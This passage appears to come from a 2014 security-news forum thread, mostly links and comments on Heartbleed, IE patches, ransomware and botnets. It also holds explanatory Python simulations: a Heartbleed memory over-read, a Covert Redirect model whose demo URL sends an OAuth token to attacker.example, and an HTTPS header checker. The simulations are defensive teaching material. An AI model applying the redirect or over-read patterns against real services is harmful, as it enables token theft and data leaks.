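    memory = bytearray(record + SECRET)
    return handler(memory, len(record))


def leaked_bytes(response, payload):
    """Whatever the reply contains beyond an honest echo of `payload`."""
    if response is None:
        return b""
    return response[HEADER_LEN + len(payload):]


if __name__ == "__main__":
    for name, handler in (("vulnerable", vulnerable_handler), ("fixed", fixed_handler)):
        reply = simulate(handler, b"hi", claimed_length=40)
        print(name, "leaked:", leaked_bytes(reply, b"hi"))
```

The honest request (two bytes, length field 2) is answered identically by both handlers, which is why the bug went unnoticed in normal traffic; only a mismatched length field tells the two apart. Note that the patched check is purely about lengths, which is why changing passwords was still necessary after patching: the bytes already read out of memory stay read.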
-
All versions of WordPress are holed, critical security update available: http://wordpress.org/news/2014/04/wordpress-3-8-2/
link article author: Andrew Nacin.
polonus
-
The Heartbleed Hit List. Who has to change passwords? Read and check here: http://mashable.com/2014/04/09/heartbleed-bug-websites-affected/
link info authors = Samantha Murphy Kelly, Lorenzo Franceschi-Bicchierai, Seth Fiegerman, Adario Strange and Kurt Wagner
polonus
If you downloaded dropbox, well dropbox was/is vulnerable - so you have to change your passwords there!
-
More news about the Heartbleed Bug.
http://money.cnn.com/2014/04/10/technology/security/heartbleed-passwords/index.html?hpt=hp_t3
-
http://www.businessweek.com/news/2014-04-11/nsa-said-to-have-used-heartbleed-bug-exposing-consumers
NSA Said to Exploit Heartbleed Bug for Intelligence for Years
The U.S. National Security Agency knew for at least two years about a flaw in the way that many websites send sensitive information, now dubbed the Heartbleed bug, and regularly used it to gather critical intelligence, two people familiar with the matter said.
-
If the NSA stuck to what they were created for that's a good thing.
But they have way overstepped their mission. And are catching hell for it.
The NSA now has a huge image problem especially here in the U.S. of A.
-
If the NSA stuck to what they were created for that's a good thing.
But they have way overstepped their mission. And are catching hell for it.
The NSA now has a huge image problem especially here in the U.S. of A.
And in comparison to what some other countries are doing, the NSA is still in training..... :(
-
http://www.bbc.co.uk/news/technology-27028101
Heartbleed hacks hit Mumsnet and Canada's tax agency
-
Heartbleed arrest made!
One down but how many more? ???
http://money.cnn.com/2014/04/16/technology/security/canada-heartbleed/index.html?hpt=hp_t2
-
Chinese Anti-Virus Protects Windows XP PC During 13 Hours of Continuous Attacks
http://news.softpedia.com/news/Chinese-Anti-Virus-Protects-Windows-XP-PC-During-13-Hours-of-Continuous-Attacks-436187.shtml
-
Latest AV-Comparatives March test http://chart.av-comparatives.org/chart1.php
-
Latest AV-Comparatives March test http://chart.av-comparatives.org/chart1.php
C'mon Avast you can do better :)
-
Critical Java Update
http://krebsonsecurity.com/2014/04/critical-java-update-plugs-37-security-holes/
-
HeartBleed bug will get the attention it deserves, read here: http://www.dhs.gov/blog/2014/04/18/update-heartbleed
link article author = Phyllis Schneck, NPPD Deputy Under Secretary for Cybersecurity
polonus
-
Good video with Mark Russinovich.
Malware Hunting with the Sysinternals Tools
http://channel9.msdn.com/Events/TechEd/NorthAmerica/2013/ATC-B308#fbid=
-
Good video with Mark Russinovich.
Malware Hunting with the Sysinternals Tools
http://channel9.msdn.com/Events/TechEd/NorthAmerica/2013/ATC-B308#fbid=
Thank you for the link. ;D BTW, it is possible to directly download the file and view it later. Just click on the MP4 or WMV blue hyperlink just below the video window and download it and you can then watch later when you have the time. File size is 754 MB, so you will need a DSL connection or faster to get it tho, as dial-up would take eons. Just saying.
-
Internet security relies on a few volunteers.
http://money.cnn.com/2014/04/18/technology/security/heartbleed-volunteers/index.html
-
Cisco, Microsoft, VMware, and other tech giants unite behind critical open-source projects
http://www.zdnet.com/cisco-microsoft-vmware-and-other-tech-giants-unite-behind-critical-open-source-projects-7000028743/
-
Microsoft Security Advisory 2963983
Vulnerability in Internet Explorer Could Allow Remote Code Execution
https://technet.microsoft.com/en-US/library/security/2963983
-
To be protected against new IE zero day enable Enhanced Protected Mode,
read: http://blogs.msdn.com/b/ie/archive/2012/03/14/enhanced-protected-mode.aspx
polonus
-
No fix for XP users
http://blogs.norman.com/2014/business/no-fix-for-xp-users
-
Beware malware myths involving Malaysia Flight MH370
http://blogs.norman.com/2014/for-consumption/beware-malware-myths-involving-malaysia-flight-mh370
-
Avast responds to IE hacking.
http://blog.avast.com/2014/04/29/internet-explorer-users-avast-has-got-your-back-for-free/
-
Avast responds to IE hacking.
http://blog.avast.com/2014/04/29/internet-explorer-users-avast-has-got-your-back-for-free/
Great. :)
-
MS is releasing an IE update today for all versions (including XP) http://blogs.technet.com/b/msrc/archive/2014/05/01/out-of-band-release-to-address-microsoft-security-advisory-2963983.aspx
EDIT : Available now
-
No fix for XP users
http://blogs.norman.com/2014/business/no-fix-for-xp-users
MS is releasing an IE update today for all versions (including XP) http://blogs.technet.com/b/msrc/archive/2014/05/01/out-of-band-release-to-address-microsoft-security-advisory-2963983.aspx
EDIT : Available now
Whaddya know? Microsoft? For XP? Nice.
-
Microsoft Explains Why It Decided to Patch Windows XP Despite End of Support
http://news.softpedia.com/news/Microsoft-Explains-Why-It-Decided-to-Patch-Windows-XP-Despite-End-of-Support-440318.shtml
-
Microsoft Explains Why It Decided to Patch Windows XP Despite End of Support
http://news.softpedia.com/news/Microsoft-Explains-Why-It-Decided-to-Patch-Windows-XP-Despite-End-of-Support-440318.shtml
That was my best guess, XP with some 30% of OS Market share (not sure about their 26% claim) and many of them still using IE - if MS didn't patch then many of them would be forced to migrate to other browsers. That would be a big drop in Browser market share for IE.
Once they migrate to another browser, who knows even if they upgrade their OS they may stick with their new browser. MS want you to stick with IE, but to upgrade your OS, unfortunately for many that would mean a system upgrade/replacement.
-
An important example that the Internet is fundamentally broken/holed and big players are reluctant to fix it.
See this typical example of a so-called WONTFIX: http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html
link article author = Wang Jing
polonus
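The Covert Redirect issue linked above, modelled end to end as an added example (this is not code from Wang Jing's write-up or from any provider). It shows the two ingredients the attack needs, each beside its fix: the provider's redirect_uri check (lax domain match against exact match with the registered URIs) and the client site's own redirector endpoint (open against restricted to local paths). The host names, the `?next=` parameter, the registered URI and the token value are made up for illustration.

```python
"""Covert Redirect in OAuth 2.0 / OpenID Connect, modelled end to end.

Added example; not code from the linked write-up or from any provider.
Host names, the ?next= parameter and the token value are assumptions.
"""
from urllib.parse import parse_qs, urlsplit, urlunsplit

# Hypothetical redirect URIs the client registered with the provider.
REGISTERED_REDIRECT_URIS = {"https://client.example/oauth/callback"}
CLIENT_DOMAIN = "client.example"


def lax_redirect_ok(redirect_uri):
    """Weak provider check: any HTTPS URL on the client's domain is accepted.
    This is the behaviour Covert Redirect abuses."""
    u = urlsplit(redirect_uri)
    return u.scheme == "https" and u.hostname == CLIENT_DOMAIN


def strict_redirect_ok(redirect_uri):
    """Strong provider check: byte-for-byte match with a registered URI,
    no prefix or wildcard matching and no extra query or fragment."""
    u = urlsplit(redirect_uri)
    return not u.query and not u.fragment and redirect_uri in REGISTERED_REDIRECT_URIS


def open_redirector(next_url):
    """Client endpoint /redirect?next=...: sends the browser wherever it is told."""
    return next_url


def safe_redirector(next_url):
    """Hardened redirector: only same-site absolute paths are honoured. Anything
    with a scheme, a host, a protocol-relative '//' prefix or a backslash
    (which some browsers normalise to '/') falls back to '/'."""
    u = urlsplit(next_url)
    if (u.scheme or u.netloc or "\\" in u.path
            or not u.path.startswith("/") or u.path.startswith("//")):
        return "/"
    return urlunsplit(("", "", u.path, u.query, ""))


def deliver_token(redirect_uri, provider_check, client_redirector):
    """Where the access token ends up in the implicit flow (token in the URL
    fragment). Returns None when the provider refuses the redirect_uri."""
    if not provider_check(redirect_uri):
        return None
    landing = redirect_uri + "#access_token=T0K3N"
    parts = urlsplit(landing)
    nxt = parse_qs(parts.query).get("next")
    if not nxt:
        return landing
    # The client's redirector answers with a 302. Browsers re-attach the
    # original fragment to the new Location when it has none of its own,
    # so the token travels with the hop.
    hop = client_redirector(nxt[0])
    return hop if "#" in hop else hop + "#" + parts.fragment


if __name__ == "__main__":
    attack = "https://client.example/redirect?next=https://attacker.example/"
    for check in (lax_redirect_ok, strict_redirect_ok):
        for redirector in (open_redirector, safe_redirector):
            print(check.__name__, redirector.__name__, "->",
                  deliver_token(attack, check, redirector))
```

Running it shows the four combinations: with the lax provider check and an open redirector the token lands on attacker.example; fixing either side (exact-match redirect_uri at the provider, or a redirector that only accepts local paths at the client) stops the leak, which is why the provider-side "WONTFIX" stance leaves every client with an open redirector exposed.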
-
AV Comparatives analysis of Data Transmission of security products
http://www.ghacks.net/2014/05/03/av-comparatives-analysis-data-transmission-security-products/
-
Dropbox Scrambles To Block Leaks Of Shared Data
http://www.techweekeurope.co.uk/news/dropbox-scrambles-block-leaks-shared-data-144992
-
New ransomeware found on Android
http://www.theguardian.com/technology/2014/may/08/android-porn-koler-a-ransomware
-
New ransomeware found on Android
http://www.theguardian.com/technology/2014/may/08/android-porn-koler-a-ransomware
http://forum.avast.com/index.php?topic=147567.msg1089993#msg1089993 :)
-
Is making websites wiretap-ready for FBI surveillance backdoors undermining cybersecurity?
These experts think it is: https://cdt.org/blog/leading-security-experts-say-fbi-wiretapping-proposal-would-undermine-cybersecurity/
They did not listen, because that was a year ago and now? -> http://www.cnet.com/news/fbi-we-need-wiretap-ready-web-sites-now/
link article author = Declan McCullagh
polonus
-
Two interesting articles...
http://www.scmagazine.com/ransomware-on-android-scares-users-with-govt-notices-asks-for-300/article/346005/
http://www.scmagazine.com/report-shows-major-spike-in-malicious-emails-at-years-start/article/346003/
-
Microsoft Security Bulletin Summary May 2014
https://technet.microsoft.com/library/security/ms14-may
-
Adobe Security Bulletin
http://helpx.adobe.com/security/products/reader/apsb14-15.html
-
System admins upgraded to get a vulnerable Heartbleed server: https://vivaldi.net/en/blogs/entry/heartbleed-status-upgrading-to-heartbreak
link article author = Yngve Pettersen
Worse still that only 14% of secure website admins were capable of coping with three-step securing properly against Heartbreak: http://news.netcraft.com/archives/2014/05/09/keys-left-unchanged-in-many-heartbleed-replacement-certificates.html
What do we call this, a case of "epic fail"?
polonus
-
CryptoWall ransomware gives you an additional fine: http://www.bleepingcomputer.com/forums/t/533715/cryptowall-a-new-ransomware-from-the-creators-of-cryptodefense/ (poster = Grimler)
polonus
-
Urgent Security Update Regarding Your Bitly Account
http://blog.bitly.com/post/85169217199/urgent-security-update-regarding-your-bitly-account
-
Why You Should Ditch Adobe Shockwave
http://krebsonsecurity.com/2014/05/why-you-should-ditch-adobe-shockwave/
-
eBay users, change passwords NOW!
http://www.bbc.co.uk/news/technology-27504142
-
Hole in IE8 left open: http://zerodayinitiative.com/advisories/ZDI-14-140/ (deadline passed 108 days ago)
polonus
-
Hole in IE8 left open: http://zerodayinitiative.com/advisories/ZDI-14-140/ (deadline passed 108 days ago)
polonus
All the more reason to update to something more secure than Windows XP
If you're still using XP, then at least change to a more secure browser like Chrome (https://www.google.com/intl/en_us/chrome/browser/) or Firefox (http://www.mozilla.org/en-US/firefox/new/)
-
More on the eBay disaster.
http://www.telegraph.co.uk/technology/internet-security/10849689/eBay-hacking-online-gangs-are-after-you.html
Up to 233 million people have had their personal details stolen – their telephone numbers, their names, their postal and email addresses, their dates of birth and the passwords to their accounts. Of those 233 million, 15 million were eBay customers in Britain.
-
How to Update Windows XP After End of Support
http://news.softpedia.com/news/How-to-Update-Windows-XP-after-End-of-Support-443631.shtml
I am not brave enough to try this on my other PC.
-
IoT, cloud computing, and nation-state threats redefine enterprise security
http://www.computerworld.com/s/article/9248523/IoT_cloud_computing_and_nation_state_threats_redefine_enterprise_security
-
World Cup websites struck!
http://www.zdnet.com/world-cup-websites-struck-down-by-ddos-attacks-7000030479/
-
Urgent Alert: Increasing Cryptolocker Traffic http://blogs.norman.com/2014/business/urgent-alert-increasing-crytolocker-traffic
-
Urgent Alert: Increasing Cryptolocker Traffic http://blogs.norman.com/2014/business/urgent-alert-increasing-crytolocker-traffic
Thanks, Pondus. The latest version (6) of CryptoPrevent was released just yesterday.
http://www.foolishit.com/vb6-projects/cryptoprevent/
-
Hackers blackmailing Domino's Pizza for a €30,000 slice of earnings
http://www.v3.co.uk/v3-uk/news/2350220/hackers-blackmailing-dominos-pizza-for-a-eur30-000-slice-of-earnings
-
how nice.... i bet it is cheap also.... i will take two ;D
Android phone built in China comes equipped with malware
http://www.phonearena.com/news/Android-phone-built-in-China-comes-equipped-with-malware_id57159
-
Another RAT crawls out of the malware drain
http://www.theregister.co.uk/2014/06/17/another_rat_crawls_out_of_the_malware_drain/
-
Google-owned VirusTotal releases file-scanning tool for Mac users
http://www.pcworld.co.nz/article/546082/google-owned_virustotal_releases_file-scanning_tool_mac_users/
-
Thousands and thousands of servers leak admin password in plain text via port 49152.
Identification is easy using the Shodan search engine.
Read about the threat here: http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
Confirmed here as an urge to patch: https://isc.sans.edu/diary/New+Supermicro+IPMIBMC+Vulnerability/18285
polonus
-
LinkedIn 0day Vulnerability Puts Your Data at Risk
http://blog.zimperium.com/linkedin-0day-vulnerability-puts-your-data-at-risk/
-
Automated False Positives
http://www.pandasecurity.com/mediacenter/malware/automated-false-positives/
-
Automated False Positives
http://www.pandasecurity.com/mediacenter/malware/automated-false-positives/
Hi Pondus,
Very interesting read on false positives created by generic heuristic detection. So one av manipulating the detection of another.
With malsites the most important cause of false positives are benign sites that are hosted on bad hosting Autonomous Systems. This is the main class of false positive website flags.
Of course for files the misinterpretation of packer obfuscation patterns is the main cause of false positive finds.
Damian
-
Automated False Positives
http://www.pandasecurity.com/mediacenter/malware/automated-false-positives/
Hi Pondus,
Very interesting read on false positives created by generic heuristic detection. So one av manipulating the detection of another.
With malsites the most important cause of false positives are benign sites that are hosted on bad hosting Autonomous Systems. This is the main class of false positive website flags.
Of course for files the misinterpretation of packer obfuscation patterns is the main cause of false positive finds.
Damian
Note how avast! did not join the charade. ;)
-
Google Glasses can be used to steal PIN numbers!
http://www.telegraph.co.uk/technology/google/10924369/How-Google-Glass-can-be-used-to-steal-your-PIN-code.html
-
Google Glasses can be used to steal PIN numbers!
http://www.telegraph.co.uk/technology/google/10924369/How-Google-Glass-can-be-used-to-steal-your-PIN-code.html
I'm sure there are cheaper ways to do that task.... :)
-
Malicious saudi-arabian surveillance spyware app :
http://www.hrw.org/news/2014/06/27/saudi-arabia-malicious-spyware-app-identified
polonus
-
Mobile Tor-browsers leak user's IP-address: http://xordern.net/ip-leakage-of-mobile-tor-browsers.html
article author Dominik Bok
check the mobile Tor browser here: http://xordern.net/ip-leakage-check.html
polonus
-
Furor Erupts Over Facebook's Experiment on Users
Almost 700,000 Unwitting Subjects Had Their Feeds Altered to Gauge Effect on Emotion
http://online.wsj.com/articles/furor-erupts-over-facebook-experiment-on-users-1404085840?mod=Tech_newsreel_1
-
Microsoft takes on global cybercrime epidemic in tenth malware disruption
http://blogs.technet.com/b/microsoft_blog/archive/2014/06/30/microsoft-takes-on-global-cybercrime-epidemic-in-tenth-malware-disruption.aspx
https://www.noip.com/blog/2014/06/30/ips-formal-statement-microsoft-takedown/
-
Facebook: Unethical, untrustworthy, and now downright harmful. (http://www.zdnet.com/facebook-unethical-untrustworthy-and-now-downright-harmful-7000031106/)
Seriously contemplating Kissing Facebook Bye Bye...
-
Serious hole in popular WP-plugin patched: https://wordpress.org/plugins/wysija-newsletters/
polonus
-
Russian Hackers Targeting Oil and Gas Companies
http://www.nytimes.com/2014/07/01/technology/energy-sector-faces-attacks-from-hackers-in-russia.html?ref=technology&_r=1
@ bob3160,
It was time to leave a long time ago. It's one of the things they can do with their data.
-
Facebook: Unethical, untrustworthy, and now downright harmful. (http://www.zdnet.com/facebook-unethical-untrustworthy-and-now-downright-harmful-7000031106/)
Seriously contemplating Kissing Facebook Bye Bye...
How to delete or disable your Facebook account | TechHive
http://www.techhive.com/article/2050324/how-to-delete-or-disable-your-facebook-account.html#tk.nl_pwr
-
Microsoft Security Bulletin Advance Notification for July 2014
https://technet.microsoft.com/library/security/ms14-jul
-
Low budget Tor de-anonymization realised: https://www.blackhat.com/us-14/briefings.html#you-dont-have-to-be-the-nsa-to-break-tor-deanonymizing-users-on-a-budget
link article authors: Alexander Volynkin & Michael McCord
polonus
-
Beware! FileHippo tests adware distributing download manager
http://www.ghacks.net/2014/07/08/beware-filehippo-tests-adware-distributing-download-manager/
-
CryptoWall malware beaten by R-Studio recovery tool:
http://www.wyattroersma.com/?p=108
(link article author Wyatt Roersma)
polonus
-
Some free software does not always come free!
Why one should shun and avoid bloatware: http://www.cert.org/blogs/certcc/post.cfm?EntryID=199
link article author = Will Dormann
polonus
-
Some free software does not always come free!
Why one should shun and avoid bloatware: http://www.cert.org/blogs/certcc/post.cfm?EntryID=199
link article author = Will Dormann
polonus
Just to clarify.
Whenever Download.com offers their big and prominent Downloader which includes the unwanted software, they also offer a "Direct Download" button usually in much smaller letters directly under the unwanted Downloader.
Always choose the "Direct Download" option.
-
jQuery Bad Behavior - about jQuery Selector Injection, one of the deadliest Web Attacks. Front-end developers and coders should listen to Mike Shema and take their precautions. Read here: http://deadliestwebattacks.com/tag/jquery/
polonus
-
Cybercriminals try to re-launch GameOver botnet: http://blog.malcovery.com/blog/breaking-gameover-zeus-returns
Link article authors: Brendan Griffin and Gary Warner
polonus
P.S. 10 AV-solutions detect the malware.
-
Some free software does not always come free!
Why one should shun and avoid bloatware: http://www.cert.org/blogs/certcc/post.cfm?EntryID=199
link article author = Will Dormann
polonus
Just to clarify.
Whenever Download.com offers their big and prominent Downloader which includes the unwanted software, they also offer a "Direct Download" button usually in much smaller letters directly under the unwanted Downloader.
Always choose the "Direct Download" option.
As does filehippo. As always it's generally best to do a custom install.
-
Hi Para-Noid,
Then you always should have this last-resort tool, the Junkware Removal Tool: http://thisisudax.org/download
but that is to put the cart before the horse, better do a custom install to avoid bloatware, junk and crap.
Damian
Junkware Removal Tool is a security utility that searches for and removes common adware, toolbars, and potentially unwanted programs (PUPs) from your computer. A common tactics among freeware publishers is to offer their products for free, but bundle them with PUPs in order to earn revenue. This tool will help you remove these types of programs.
Junkware Removal Tool has the ability to remove the following types of programs:
• Ask Toolbar
• Babylon
• Browser Manager
• Claro / iSearch
• Conduit
• Coupon Printer for Windows
• Crossrider
• Facemoods / Funmoods
• iLivid
• IncrediBar
• MyWebSearch
• Searchqu
• Web Assistant
D
-
Hi Para-Noid,
Then you always should have this last-resort tool, the Junkware Removal Tool: http://thisisudax.org/download
but that is to put the cart before the horse, better do a custom install to avoid bloatware, junk and crap.
Damian
Something I recommended over a year ago. :)
https://forum.avast.com/index.php?topic=19387.msg968367#msg968367
-
Microsoft Security Advisory 2982792
Improperly Issued Digital Certificates Could Allow Spoofing
https://technet.microsoft.com/en-us/library/security/2982792
-
Quote from bob3160:
Something I recommended over a year ago. :)
https://forum.avast.com/index.php?topic=19387.msg968367#msg968367
Thanks for confirming this is a good advice/choice.
Good we give likewise advice independently,
because we must have something in common being here on these forums that long ;D
Damian
-
jQuery Bad Behavior - about jQuery Selector Injection, one of the deadliest Web Attacks. Front-end developers and coders should listen to Mike Shema and take their precautions. Read here: http://deadliestwebattacks.com/tag/jquery/
polonus
Interesting read. Thanks for the link polonus.
~!Donovan
-
Gameover Zeus botnet immortal, like the greek god: http://blog.malcovery.com/blog/breaking-gameover-zeus-returns
link article authors: Brendan Griffin and Gary Warner
Using dynamic IP and FastFlux C&C, techniques learnt from spammers, and domain generation on the fly is why botnets will win the race over security forces trying to take them down.
polonus
-
Digital First Aid: https://digitaldefenders.org/digitalfirstaid/
link source DigiDefenders
polonus
-
As forum friends here may have noticed from my constant reporting in the "virus and worms sector"
a lot of so-called SE redirects are often going under the detection radar.
See an example here: https://forum.avast.com/index.php?topic=151778.msg1104900#msg1104900
For the only scanner to detect this, see this malware scanner report at killmalware: http://killmalware.com/ffinlo.com/#
Sometimes this SE redirect spam or click fraud lives only for a couple of hours or days. Sometimes it is more persistent.
Here is a handy tool to work on your site to detect SE Spam: http://tool.motoricerca.info/spam-detector/
polonus
-
It's always nice to get a clean bill of health.:)
http://evuln.com/tools/malware-scanner/bob3160.blogspot.com/
http://killmalware.com/mlpaa.org/
-
Hi bob3160,
All OK on the spam detector for http://bob3160.blogspot.com/ , see attached image.
Damian
-
SSL Blacklist: https://sslbl.abuse.ch/
List author = Roman Huessy, introducing the list here: http://www.abuse.ch/?p=8180
polonus
-
yepp.... i still trust my memory. ;)
Popular password protection programs p0wnable
http://www.theregister.co.uk/2014/07/14/popular_web_password_vaults_blurting_codes/
The Emperor’s New Password Manager: Security Analysis of Web-based Password Managers
pdf.doc http://devd.me/papers/pwdmgr-usenix14.pdf
-
Beware Keyloggers at Hotel Business Centers
http://krebsonsecurity.com/2014/07/beware-keyloggers-at-hotel-business-centers/
-
CNET attacked by Russian hacker group
http://www.cnet.com/news/cnet-attacked-by-russian-hacker-group/
-
European cloud data not protected against US Government
Read: http://www.zdnet.com/blog/igeneration/microsoft-admits-patriot-act-can-access-eu-based-cloud-data/11225
link article author = Zack Whittaker
polonus
-
Beware Keyloggers at Hotel Business Centers
http://krebsonsecurity.com/2014/07/beware-keyloggers-at-hotel-business-centers/
There was an interesting article in this morning's Sophos newsletter -- the German government is seriously considering abandoning email entirely and switching to old-fashioned typewriters for communications. And not even electric, let alone electronic, ones, they're talking about antique totally-manual machines. I was surprised to learn that key-logging devices go all the way back to the IBM Selectric, probably the most widely used electric typewriter ever.
-
Beware Keyloggers at Hotel Business Centers
http://krebsonsecurity.com/2014/07/beware-keyloggers-at-hotel-business-centers/
There was an interesting article in this morning's Sophos newsletter -- the German government is seriously considering abandoning email entirely and switching to old-fashioned typewriters for communications. And not even electric, let alone electronic, ones, they're talking about antique totally-manual machines. I was surprised to learn that key-logging devices go all the way back to the IBM Selectric, probably the most widely used electric typewriter ever.
Interesting comment.
With IoT devices on the way, (if they're not here already) expect more of the same, maybe worse. IoT devices don't sell, then maybe less of a security concern.
http://en.wikipedia.org/wiki/Internet_of_Things
-
CNET Hacked!
http://www.cnet.com/news/cnet-attacked-by-russian-hacker-group/
-
CNET Hacked!
http://www.cnet.com/news/cnet-attacked-by-russian-hacker-group/
I think you're a little late....Sometimes, one needs to look up :)
https://forum.avast.com/index.php?topic=52252.msg1106150#msg1106150
-
Do cars come with Antivirus in the future?
Chinese hackers take command of Tesla Model S
http://www.cnet.com/news/chinese-hackers-take-command-of-tesla-model-s/
-
NSA critics: Dropbox hostile to privacy
Read: http://www.theguardian.com/technology/2014/jul/17/edward-snowden-dropbox-privacy-spideroak
For more secure alternatives, see: ( http://lifehacker.com/the-best-cloud-storage-services-that-protect-your-priva-729639300 )
For a more secure alternative: http://www.arxshare.com
polonus
-
NSA critics: Dropbox hostile to privacy
Read: hxxp://www.theguardian.com/technology/2014/jul/17/edward-snowden-dropbox-privacy-spideroak
For more secure alternatives, see: ( hxxp://lifehacker.com/the-best-cloud-storage-services-that-protect-your-priva-729639300 )
For a more secure alternative: hxxp://www.arxshare.com
polonus
I use dropbox, for some images and files. But in all honesty I don't store anything on any on-line storage that is in any way confidential/private.
I simply don't trust any on-line storage, regardless of its supposed privacy protection and stick to my normal adage don't publish/store anything on-line that you do not wish to be seen/accessed by anyone.
-
Worst passwords of 2013!
http://splashdata.com/press/worstpasswords2013.htm
-
Google's Chrome Web Browser Is Killing Your Laptop Battery
http://www.forbes.com/sites/ianmorris/2014/07/14/googles-chrome-web-browser-is-killing-your-laptop-battery/
-
Google's Chrome Web Browser Is Killing Your Laptop Battery
http://www.forbes.com/sites/ianmorris/2014/07/14/googles-chrome-web-browser-is-killing-your-laptop-battery/
I guess it's a good thing that my laptop is always plugged in. :)
-
EFF states that the HTTP protocol should die completely and should definitely be gone from the Internet,
this because it is unencrypted and because of NSA-critical revelations etc.
Read: http://www.tomsguide.com/us/http-must-die,news-19188.html link article author Paul Wagenseil
Only ads and content delivery (trackers) are still in need of HTTP, and also is avast! av, because it cannot scan inside HTTPS :o ::).
So insecure HTTPS is not flagged, certification issues only reported by Google and Comodo????
What about insecure policies alerted? (Recx Security Analyser for Google Chrome, Calomel SSL-validation add-on for firefox ;D ).
The EFF standpoint can be read here: https://www.eff.org/event/hope-x
polonus
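On the "insecure policies" point in the post above: what the browser add-ons mentioned there look at is, for the most part, the policy an HTTPS response declares in its headers. Here is an added example (not code from the post, nor from the Recx or Calomel add-ons) that evaluates a response's Strict-Transport-Security, cookie flags and framing/CSP headers and reports what is missing; the two header sets at the bottom are constructed samples, and the 180-day floor for HSTS is a choice made for this example.

```python
"""Transport-security policy check on HTTPS response headers.

Added example; not code from the post or from the Recx / Calomel add-ons.
The header sets at the bottom are constructed samples.
"""

SIX_MONTHS = 180 * 24 * 3600  # floor used here for HSTS max-age (preload needs a year)


def parse_hsts(value):
    """Return (max_age_seconds or None, include_subdomains) from a
    Strict-Transport-Security header value."""
    max_age, include = None, False
    for directive in value.split(";"):
        name, _, val = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            try:
                max_age = int(val.strip().strip('"'))
            except ValueError:
                max_age = None
        elif name == "includesubdomains":
            include = True
    return max_age, include


def cookie_findings(set_cookie):
    """Flag a Set-Cookie header whose cookie can leak over HTTP or to script."""
    parts = [p.strip() for p in set_cookie.split(";")]
    name = parts[0].partition("=")[0].strip()
    attrs = {p.partition("=")[0].strip().lower() for p in parts[1:]}
    out = []
    if "secure" not in attrs:
        out.append(f"cookie {name!r} lacks Secure: sent in clear over HTTP")
    if "httponly" not in attrs:
        out.append(f"cookie {name!r} lacks HttpOnly: readable by injected script")
    return out


def check_policy(headers):
    """headers: list of (name, value) tuples as received. Returns a list of
    findings; an empty list means the response declares a sound policy."""
    findings = []

    def get(n):
        return [v for k, v in headers if k.lower() == n]

    hsts = get("strict-transport-security")
    if not hsts:
        findings.append("no Strict-Transport-Security: browser may still be downgraded to HTTP")
    else:
        max_age, include = parse_hsts(hsts[0])
        if not max_age:
            findings.append("HSTS max-age missing or zero (policy disabled)")
        elif max_age < SIX_MONTHS:
            findings.append(f"HSTS max-age={max_age} expires in under 180 days")
        if not include:
            findings.append("HSTS without includeSubDomains: subdomains remain exposed")
    for v in get("set-cookie"):
        findings.extend(cookie_findings(v))
    csp = get("content-security-policy")
    if not csp:
        findings.append("no Content-Security-Policy: mixed content and injected script unrestricted")
    if not get("x-frame-options") and not any("frame-ancestors" in v for v in csp):
        findings.append("no X-Frame-Options / frame-ancestors: clickjacking not mitigated")
    return findings


# Constructed samples: what a weak and a sound HTTPS response might declare.
WEAK_HEADERS = [
    ("Content-Type", "text/html"),
    ("Strict-Transport-Security", "max-age=600"),
    ("Set-Cookie", "session=abc123; Path=/"),
]
SOUND_HEADERS = [
    ("Content-Type", "text/html"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Set-Cookie", "session=abc123; Path=/; Secure; HttpOnly"),
    ("Content-Security-Policy", "default-src 'self'; frame-ancestors 'none'"),
]

if __name__ == "__main__":
    for label, hdrs in (("weak", WEAK_HEADERS), ("sound", SOUND_HEADERS)):
        print(label, check_policy(hdrs) or "no findings")
```

Note what this does not cover: certificate validity and cipher strength are negotiated in the TLS handshake, not declared in headers, so a site can pass every check here and still be "insecure HTTPS" in the sense of a weak certificate chain. That part needs a TLS-level check rather than a header check.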
-
Interesting observation to the above issue:
It appears that every Alexa-ranked company from China offers NO SSL, which facilitates gov censorship and Amazon, Yandex, Instagram, Ebay, Craigslist all force http (as does OpenDNS non-dashboard use), likely due to mixed content.
- Quote taken from list link below.
See list link: https://docs.google.com/spreadsheets/d/1HirCBS8bK89-jPrLc2cmru48R-3s9mUTJVwni3DO_Sw/pubhtml
pol
-
EFF states that the HTTP protocol should die completely and should definitely be gone from the Internet,
this because it is unencrypted and because of NSA-critical revelations etc.
Read: http://www.tomsguide.com/us/http-must-die,news-19188.html link article author Paul Wagenseil
Only ads and content delivery (trackers) are still in need of HTTP, and also is avast! av, because it cannot scan inside HTTPS :o ::).
So insecure HTTPS is not flagged, certification issues only reported by Google and Comodo????
What about insecure policies alerted? (Recx Security Analyser for Google Chrome, Calomel SSL-validation add-on for firefox ;D ).
The EFF standpoint can be read here: https://www.eff.org/event/hope-x
polonus
Well it has been an aspiration of avast to be able to scan https content, in so much as it does with secure email traffic. But I rather think it is more complex than that simple explanation and no date/time frame or avast version was given for these aspirations.
-
Hi DavidR,
I fully understand what you mean to say.
Reality and the EFF desired development are two quite different things.
It also isn't clear what is reality here.
It is all a little too little and too late.
These developments should have started years and years ago.
Now with hindsight knowledge we have quite another view of what http: security is.
polonus
-
This is just sick!
http://www.dailymail.co.uk/news/article-2699425/Facebook-scammers-prey-Aussie-MH17-victims-setting-fake-tribute-pages-names-drive-traffic-dodgy-pop-ad-site.html
-
not new, but not sure if it has been posted
Beware! FileHippo tests adware distributing download manager
https://www.ghacks.net/2014/07/08/beware-filehippo-tests-adware-distributing-download-manager/
What is the FileHippo Download Manager?
http://www.filehippo.com/de/filehippo_download_manager
-
not new, but not sure if it has been posted
Beware! FileHippo tests adware distributing download manager
https://www.ghacks.net/2014/07/08/beware-filehippo-tests-adware-distributing-download-manager/
What is the FileHippo Download Manager?
http://www.filehippo.com/de/filehippo_download_manager
Always use the Direct Download link just as on Cnet.com
-
WSJ Takes Some Computer Systems Offline After Cyber Intrusion
http://online.wsj.com/articles/wsj-takes-some-computer-systems-offline-after-cyber-intrusion-1406074055?mod=dist_smartbrief
-
July 2014 update for Microsoft Silverlight 5
http://support.microsoft.com/kb/2977218
This update follows two earlier updates on July 9, 2014 (Microsoft Tuesday):
http://support.microsoft.com/kb/2847559/en-us
http://support.microsoft.com/kb/2861561/en-us
Out-of band update.
-
Mashable – Chromecast Hack Lets You Rickroll Your Neighbor’s TV
http://www.bishopfox.com/news/2014/07/mashable-chromecast-hack-lets-rickroll-neighbors-tv/
